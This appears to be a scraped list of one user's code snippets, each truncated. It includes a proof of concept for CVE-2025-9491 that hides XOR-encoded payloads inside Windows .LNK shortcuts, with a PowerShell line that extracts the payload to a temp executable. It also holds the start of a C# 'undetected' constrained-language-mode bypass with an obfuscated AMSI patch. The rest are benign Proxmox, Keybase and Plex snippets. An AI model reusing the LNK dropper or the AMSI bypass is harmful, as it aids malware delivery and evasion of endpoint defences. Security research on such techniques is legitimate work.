mariolima

#!/bin/python3
# https://nvd.nist.gov/vuln/detail/CVE-2025-9491
# Simple PoC for CVE-2025-9491 that masks .LNKs with hidden payloads. 

ps1_payload = "calc.exe"

# Gets and XOR decodes payload contents from inside the LNK file
ps1_payload = """[byte[]]((gc *.lnk -enc 3 | ? {$_.length -ne 0x00012126})[-100..-1] | % { $_ -bxor 0x77 }) | ac -Path "$env:TEMP\\foo.exe" -enc 3"""

def encode_and_pad(string, padding, size):

mariolima

from https://forum.proxmox.com/threads/two-windows-guests-communicating-via-serial-console-comn.67588/

SSH to ProxMox and do the following:

Code: Code: Provided by Stefan_R

# 101 ID of first VM
# 102 ID of second VM

mariolima

Keybase proof

I hereby claim:

• I am mariolima on github.
• I am 0da (https://keybase.io/0da) on keybase.
• I have a public key whose fingerprint is 511E B421 733D 3662 570D 1BAA CAC3 5FE4 7AF4 6787

To claim this, I am signing this object:

mariolima

from datetime import datetime, timedelta
import requests
import json
import time

from plexapi.server import PlexServer
baseurl = 'https://my-plex-server.com'
token = 'plex-api-token'
plex = PlexServer(baseurl, token)

mariolima

// Undetected CLM Bypass with obfuscated AMSI patch
using System;
using System.Management.Automation;
using System.Text;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass {
	class Program {
		 [DllImport("kernel32")]